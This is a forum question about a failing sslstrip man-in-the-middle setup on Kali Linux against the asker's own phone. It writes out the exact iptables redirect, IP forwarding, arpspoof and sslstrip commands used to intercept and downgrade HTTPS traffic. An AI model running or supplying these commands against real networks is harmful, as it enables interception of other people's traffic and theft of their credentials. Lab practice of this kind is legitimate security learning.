# How can I get MITM attack using sslstrip to work?

Tags: kali-linux, sslstrip

I performed the following steps:

I modified iptables to **forward** to another port:

```
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
```

I allowed **port forwarding**:

```
echo 1 > /proc/sys/net/ipv4/ip_forward
```

I **arpspoofed** the gateway and victim (my mobile Android phone is a Xiaomi Note 5):

```
arpspoof -i wlan0 -t [victim IP] [gateway IP]
```

I launched **sslstrip**:

```
sslstrip -w filename.txt -l 1000
```

Each of these commands completed **without error**, so they seem to work, but nothing shows up in filename.txt. I've tried arpspoofing only one way, arpspoofing gateway first, then victim, resetting the iptables and writing rules it again, but nothing seems to work.

There are two options when arpspoofing. The victim can't access the internet at all or can, but without any delay and sslstrip won't work. My assumption is that in that case traffic "flows" through my PC, but sslstrip won't strip it.

How can I see which part of this MITM doesn't work? Is there something that I can use to verify that the traffic is redirected?
Thanks in advance.